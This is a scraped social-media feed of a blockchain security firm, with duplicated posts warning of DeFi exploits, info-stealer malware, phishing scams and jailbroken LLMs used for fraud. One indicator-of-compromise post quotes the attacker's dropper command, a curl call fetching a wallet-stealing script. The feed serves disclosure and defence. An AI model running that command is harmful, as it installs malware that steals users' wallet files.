SlowMist_Team
0 Suivis
1 Abonnés
2 J’aime
0 Partagé(s)
Publications
🚨SlowMist TI Alert🚨
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the cvcrvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the cvcrvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
🚨SlowMist TI Alert🚨
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the crvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the crvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
🚨 SlowMist TI Alert 🚨
A new malware named #SparkKitty that steals all photos from infected iOS & Android devices — searching for crypto wallet seed phrases.
⚠️ Delivered via:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ installs, now removed)
🔸 Casino apps, adult games, TikTok clones
🌍 Mainly targeting users in Southeast Asia & China, but no regional limits.
🛡️ Key tips:
🔹 Don't install unknown apps
🔹 Avoid APK sideloading
🔹 Use antivirus tools
Stay alert! (Source: @kaspersky)
A new malware named #SparkKitty that steals all photos from infected iOS & Android devices — searching for crypto wallet seed phrases.
⚠️ Delivered via:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ installs, now removed)
🔸 Casino apps, adult games, TikTok clones
🌍 Mainly targeting users in Southeast Asia & China, but no regional limits.
🛡️ Key tips:
🔹 Don't install unknown apps
🔹 Avoid APK sideloading
🔹 Use antivirus tools
Stay alert! (Source: @kaspersky)
💰Over $50B USDT in deposits and $50B in withdrawals flowed through HuionePay in the past 18 months — now under global regulatory scrutiny for allegedly receiving, moving, and cashing out scam funds (mostly via USDT on TRON).
We dug into the data with @MistTrack_io and built a Dune dashboard to map its on-chain footprint.
📊Dashboard: https://t.co/DHKtY3X9th
✍️Report: https://t.co/O6uWC2S1qU
#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
We dug into the data with @MistTrack_io and built a Dune dashboard to map its on-chain footprint.
📊Dashboard: https://t.co/DHKtY3X9th
✍️Report: https://t.co/O6uWC2S1qU
#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
🚨 Security TI Alert 🚨
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
🔍 Key IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA
🚨 We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: [email protected]
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
🔍 Key IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA
🚨 We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: [email protected]
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing
🚨SlowMist TI Alert🚨
MistEye has detected potential suspicious activities related to the @Bankroll_Status .
As always, stay vigilant!
https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
MistEye has detected potential suspicious activities related to the @Bankroll_Status .
As always, stay vigilant!
https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨SlowMist Security Alert🚨
We have detected potential suspicious activities related to @meta_pool. The root cause is that the _deposit function has been rewritten, enabling arbitrary minting through the mint function without the need to transfer tokens.
As always, stay vigilant!
We have detected potential suspicious activities related to @meta_pool. The root cause is that the _deposit function has been rewritten, enabling arbitrary minting through the mint function without the need to transfer tokens.
As always, stay vigilant!
🚨 SlowMist Security Alert🚨
‼️Beware of a new threat from the LAZARUS APT group — #OtterCookie info-stealer malware is targeting professionals in the finance and crypto industries.
🎯 Attack tactics:
🔹Posing as reputable companies with fake interviews or investment pitches
🔹Using deepfakes to impersonate interviewers/investors in video calls
🔹Tricking victims into running malware disguised as coding challenges or video app updates
🔹Once executed, OtterCookie steals sensitive data silently
🕵️♂️ Targets include:
🔹Browser-stored credentials
🔹macOS Keychain passwords & certificates
🔹Locally stored crypto wallet info & private keys
🛡️ Stay safe:
🔹Verify all unsolicited job/investment offers
🔹Never run unknown binaries, especially “challenges” or “updates”
🔹Use anti-virus software and monitor for abnormal behaviors
📚 Read more about #APT:
https://t.co/hyzwQoiu23
cc @im23pds
‼️Beware of a new threat from the LAZARUS APT group — #OtterCookie info-stealer malware is targeting professionals in the finance and crypto industries.
🎯 Attack tactics:
🔹Posing as reputable companies with fake interviews or investment pitches
🔹Using deepfakes to impersonate interviewers/investors in video calls
🔹Tricking victims into running malware disguised as coding challenges or video app updates
🔹Once executed, OtterCookie steals sensitive data silently
🕵️♂️ Targets include:
🔹Browser-stored credentials
🔹macOS Keychain passwords & certificates
🔹Locally stored crypto wallet info & private keys
🛡️ Stay safe:
🔹Verify all unsolicited job/investment offers
🔹Never run unknown binaries, especially “challenges” or “updates”
🔹Use anti-virus software and monitor for abnormal behaviors
📚 Read more about #APT:
https://t.co/hyzwQoiu23
cc @im23pds
🚨SlowMist Security Alert🚨
SlowMist recently received intelligence indicating that the Lazarus APT group is using a new stealer called OtterCookie in targeted attacks on crypto & finance pros.
🎭Tactics:
- Fake job interviews/investor calls
- Deepfake videos to impersonate recruiters
- Malware disguised as “coding challenges” or “updates”
😈Steals:
- Browser-stored login credentials
- Passwords & certificates from macOS Keychain
- Wallet info & private keys
🛡️Security Recommendations:
🔹Treat unsolicited job/investment offers and remote interviews with caution.
🔹Never run unknown binaries, especially if presented as “technical challenges” or “update packages.”
🔹Enhance EDR capabilities and monitor for abnormal activity. Use antivirus tools and regularly audit your endpoints.
⚠️Stay safe — always verify before you trust.
#Lazarus #APT #OtterCookie #CryptoSecurity
SlowMist recently received intelligence indicating that the Lazarus APT group is using a new stealer called OtterCookie in targeted attacks on crypto & finance pros.
🎭Tactics:
- Fake job interviews/investor calls
- Deepfake videos to impersonate recruiters
- Malware disguised as “coding challenges” or “updates”
😈Steals:
- Browser-stored login credentials
- Passwords & certificates from macOS Keychain
- Wallet info & private keys
🛡️Security Recommendations:
🔹Treat unsolicited job/investment offers and remote interviews with caution.
🔹Never run unknown binaries, especially if presented as “technical challenges” or “update packages.”
🔹Enhance EDR capabilities and monitor for abnormal activity. Use antivirus tools and regularly audit your endpoints.
⚠️Stay safe — always verify before you trust.
#Lazarus #APT #OtterCookie #CryptoSecurity
⚠️As AI races forward, a darker side emerges: Unrestricted Large Language Models.
Unlike mainstream LLMs with built-in safety guards, these "jailbroken" or deliberately modified models are designed to bypass ethical restrictions—enabling phishing, malware generation, and fraud.
In this article, we explore the rise of tools like WormGPT, FraudGPT, and GhostGPT, their abuse in the crypto space, and the growing security challenges they pose.
Read the full analysis👇
https://t.co/yt1r95mlP4
#AI #Cybersecurity #LLM #Phishing #Malware
Unlike mainstream LLMs with built-in safety guards, these "jailbroken" or deliberately modified models are designed to bypass ethical restrictions—enabling phishing, malware generation, and fraud.
In this article, we explore the rise of tools like WormGPT, FraudGPT, and GhostGPT, their abuse in the crypto space, and the growing security challenges they pose.
Read the full analysis👇
https://t.co/yt1r95mlP4
#AI #Cybersecurity #LLM #Phishing #Malware
🚨 SlowMist Security Alert🚨
The Android banking trojan #Crocodilus is now targeting crypto users and banking apps globally after recent upgrades.
⚠️ Key threats:
🔹Spreads via fake browser updates in Facebook ads
🔹Steals login credentials using overlay attacks
🔹Extracts crypto wallet seed phrases & private keys
🔹Injects fake "bank support" numbers into contact lists
🔹Malware-as-a-Service: Available for rent (100–300 USDT/attack)
📵 Avoid unknown app updates & ad links.
Stay alert! (Source: @ThreatFabric)
The Android banking trojan #Crocodilus is now targeting crypto users and banking apps globally after recent upgrades.
⚠️ Key threats:
🔹Spreads via fake browser updates in Facebook ads
🔹Steals login credentials using overlay attacks
🔹Extracts crypto wallet seed phrases & private keys
🔹Injects fake "bank support" numbers into contact lists
🔹Malware-as-a-Service: Available for rent (100–300 USDT/attack)
📵 Avoid unknown app updates & ad links.
Stay alert! (Source: @ThreatFabric)
🚨May 2025 Web3 Security Recap🚨
📊According to SlowMist’s Hacked(https://t.co/e90CSvTm6B):
⚠️15 hacks ➡️ ~$257M lost
❄️~$162M recovered/frozen
🎣Phishing losses via @realScamSniffer:
7,164 victims ➡️ ~$9.6M stolen
Major incidents:
• Cetus Protocol lost $230M in a math overflow attack
• Cork Protocol exploited for $12M+ due to insufficient validation of user-supplied data
• BitoPro lost $11.5M; funds laundered via Tornado Cash, Thorchain, and Wasabi
• Demex lost $950K from an oracle manipulation targeting a deprecated vault
• Zunami Protocol lost $500K; root cause under investigation
Security Highlights:
⚠️Contract vulnerabilities caused 95% of total hack losses
🎭Account takeovers surged again
😈Lazarus Group is now targeting individuals—one victim lost $5.2M to malware
✍️Full report:
📊According to SlowMist’s Hacked(https://t.co/e90CSvTm6B):
⚠️15 hacks ➡️ ~$257M lost
❄️~$162M recovered/frozen
🎣Phishing losses via @realScamSniffer:
7,164 victims ➡️ ~$9.6M stolen
Major incidents:
• Cetus Protocol lost $230M in a math overflow attack
• Cork Protocol exploited for $12M+ due to insufficient validation of user-supplied data
• BitoPro lost $11.5M; funds laundered via Tornado Cash, Thorchain, and Wasabi
• Demex lost $950K from an oracle manipulation targeting a deprecated vault
• Zunami Protocol lost $500K; root cause under investigation
Security Highlights:
⚠️Contract vulnerabilities caused 95% of total hack losses
🎭Account takeovers surged again
😈Lazarus Group is now targeting individuals—one victim lost $5.2M to malware
✍️Full report:
🚨Scam Warning
We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue.
After investigation, we identified the site—signature[.]land—as a phishing platform. The site has also been flagged as malicious by Web3 anti-scam platform @realScamSniffer.
Key findings:
♦️UI mimics the legitimate Revoke tool
♦️Risk results are fabricated for any input
♦️All user input is sent directly to: abpulimali@gmail[.]com
The operator behind this site, @Titanspace3, employs multiple deceptive tactics:
🎭Uses @zachxbt’s avatar on Telegram
🎭Poses as a SlowMist employee
🎭Runs a 74K-follower X account, frequently commenting under crypto users’ posts, falsely claiming their wallets are at risk and directing them to a phishing link disguised as a “security tool.”
Scam flow:
1⃣Fabricate panic around “risky approvals”
2⃣Lure victims into using a phishing site
3⃣Instruct them to input private keys for “revocation”
🛡️Recommendations
– Never paste your private key into any website
– Only use security tools from verified, official sources
– Stay vigilant and follow a zero-trust mindset
For a full breakdown of this case, see our latest article:
https://t.co/IvrVPrT6Su
#Phishing #Crypto #Web3 #Scam #SocialEngineering #Revoke
We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue.
After investigation, we identified the site—signature[.]land—as a phishing platform. The site has also been flagged as malicious by Web3 anti-scam platform @realScamSniffer.
Key findings:
♦️UI mimics the legitimate Revoke tool
♦️Risk results are fabricated for any input
♦️All user input is sent directly to: abpulimali@gmail[.]com
The operator behind this site, @Titanspace3, employs multiple deceptive tactics:
🎭Uses @zachxbt’s avatar on Telegram
🎭Poses as a SlowMist employee
🎭Runs a 74K-follower X account, frequently commenting under crypto users’ posts, falsely claiming their wallets are at risk and directing them to a phishing link disguised as a “security tool.”
Scam flow:
1⃣Fabricate panic around “risky approvals”
2⃣Lure victims into using a phishing site
3⃣Instruct them to input private keys for “revocation”
🛡️Recommendations
– Never paste your private key into any website
– Only use security tools from verified, official sources
– Stay vigilant and follow a zero-trust mindset
For a full breakdown of this case, see our latest article:
https://t.co/IvrVPrT6Su
#Phishing #Crypto #Web3 #Scam #SocialEngineering #Revoke
🎉 SlowMist x Foresight News Dragon Boat Festival Giveaway 🎉
Your mnemonic phrase is the lifeline of your crypto — keep it safe, keep it in mind. 🧠⛓️
@Foresight_News just dropped a cool new collectible, we're giving away 3 to the community!
To enter:
1⃣ Follow @Foresight_News & @SlowMist_Team
2⃣ Like + RT this tweet & tag 3 friends
Winners announced: June 4 🎁
Good luck to everyone!🤩
Your mnemonic phrase is the lifeline of your crypto — keep it safe, keep it in mind. 🧠⛓️
@Foresight_News just dropped a cool new collectible, we're giving away 3 to the community!
To enter:
1⃣ Follow @Foresight_News & @SlowMist_Team
2⃣ Like + RT this tweet & tag 3 friends
Winners announced: June 4 🎁
Good luck to everyone!🤩
🚨SlowMist Security Alert🚨
We detected potential suspicious activity related to @Corkprotocol.
As always, stay vigilant!
We detected potential suspicious activity related to @Corkprotocol.
As always, stay vigilant!
🚨SlowMist Security Alert🚨
☠️Recently, multiple users have reported receiving SMS messages from "well-known exchanges", saying:
🎭"Your withdrawal verification code is xxx. If you did not request this transaction, call xxx immediately for assistance."
📱Once you call back, you're told it's a “security breach” and are connected to someone claiming to be from “hardware wallet support.”
🎣They guide you to a phishing site and trick you into entering your mnemonic phrase — resulting in cold wallet thefts worth over $1 million.
⚠️Scammers know you trust exchanges — and they exploit that trust to trick you, step by step.
We recently disclosed a similar case — check out our detailed write-up to strengthen your awareness and defenses:
https://t.co/OLGtlY1HBV
Remember:
🔒Never share your mnemonic phrase.
🚫Don’t trust unexpected calls, texts, or links. Always verify via official sources.
#Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
☠️Recently, multiple users have reported receiving SMS messages from "well-known exchanges", saying:
🎭"Your withdrawal verification code is xxx. If you did not request this transaction, call xxx immediately for assistance."
📱Once you call back, you're told it's a “security breach” and are connected to someone claiming to be from “hardware wallet support.”
🎣They guide you to a phishing site and trick you into entering your mnemonic phrase — resulting in cold wallet thefts worth over $1 million.
⚠️Scammers know you trust exchanges — and they exploit that trust to trick you, step by step.
We recently disclosed a similar case — check out our detailed write-up to strengthen your awareness and defenses:
https://t.co/OLGtlY1HBV
Remember:
🔒Never share your mnemonic phrase.
🚫Don’t trust unexpected calls, texts, or links. Always verify via official sources.
#Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
In recent years, Coinbase users have repeatedly become targets of social engineering attacks — and on May 15, Coinbase confirmed insider involvement.
How it works:
📞 Fake support call
📲 Walk user through Coinbase Wallet
⚠️ Provide scam mnemonic phrase
💸 Drain assets under stress & urgency
With @MistTrack_io, we traced the flows:
▪️ BTC bridged via THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH swapped on Uniswap → DAI/USDT
▪️ Funds laundered or still dormant
Full breakdown👇
https://t.co/OLGtlY2frt
#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
How it works:
📞 Fake support call
📲 Walk user through Coinbase Wallet
⚠️ Provide scam mnemonic phrase
💸 Drain assets under stress & urgency
With @MistTrack_io, we traced the flows:
▪️ BTC bridged via THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH swapped on Uniswap → DAI/USDT
▪️ Funds laundered or still dormant
Full breakdown👇
https://t.co/OLGtlY2frt
#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
🚨SlowMist Scam Alert🚨
We’ve received reports of fake Telegram groups impersonating #SlowMist and scamming users via phishing investment links. One example: ❌t[.]me/slowmist1 — this is NOT us.‼️
✅ Please report such groups to Telegram immediately.
For your safety, always refer to our official channels:
1⃣Website: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: [email protected]
If in doubt, feel free to DM us directly.
⚠️Stay vigilant and verify before you trust.
We’ve received reports of fake Telegram groups impersonating #SlowMist and scamming users via phishing investment links. One example: ❌t[.]me/slowmist1 — this is NOT us.‼️
✅ Please report such groups to Telegram immediately.
For your safety, always refer to our official channels:
1⃣Website: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: [email protected]
If in doubt, feel free to DM us directly.
⚠️Stay vigilant and verify before you trust.
🚀Big news! @MistTrack_io MCP is now live for testing!
You can now use natural language in #Claude, #Cursor, and other MCP-supported clients to call #MistTrack’s on-chain analysis APIs — from address profiling & risk scoring to fund flow graphs.
🧐Smarter, faster, and easier blockchain investigations — powered by AI.
✍️In our latest post:
🔹What is MistTrack MCP
🔹How to use it
🔹Core features
🔹Real use case examples
https://t.co/Fvn2YZIuoI
👋Ready to explore the new AI paradigm for on-chain tracing? Start here:
https://t.co/UCDcC9Dt51
#Web3 #AI #BlockchainSecurity #MCP
You can now use natural language in #Claude, #Cursor, and other MCP-supported clients to call #MistTrack’s on-chain analysis APIs — from address profiling & risk scoring to fund flow graphs.
🧐Smarter, faster, and easier blockchain investigations — powered by AI.
✍️In our latest post:
🔹What is MistTrack MCP
🔹How to use it
🔹Core features
🔹Real use case examples
https://t.co/Fvn2YZIuoI
👋Ready to explore the new AI paradigm for on-chain tracing? Start here:
https://t.co/UCDcC9Dt51
#Web3 #AI #BlockchainSecurity #MCP
Connectez-vous pour découvrir d’autres contenus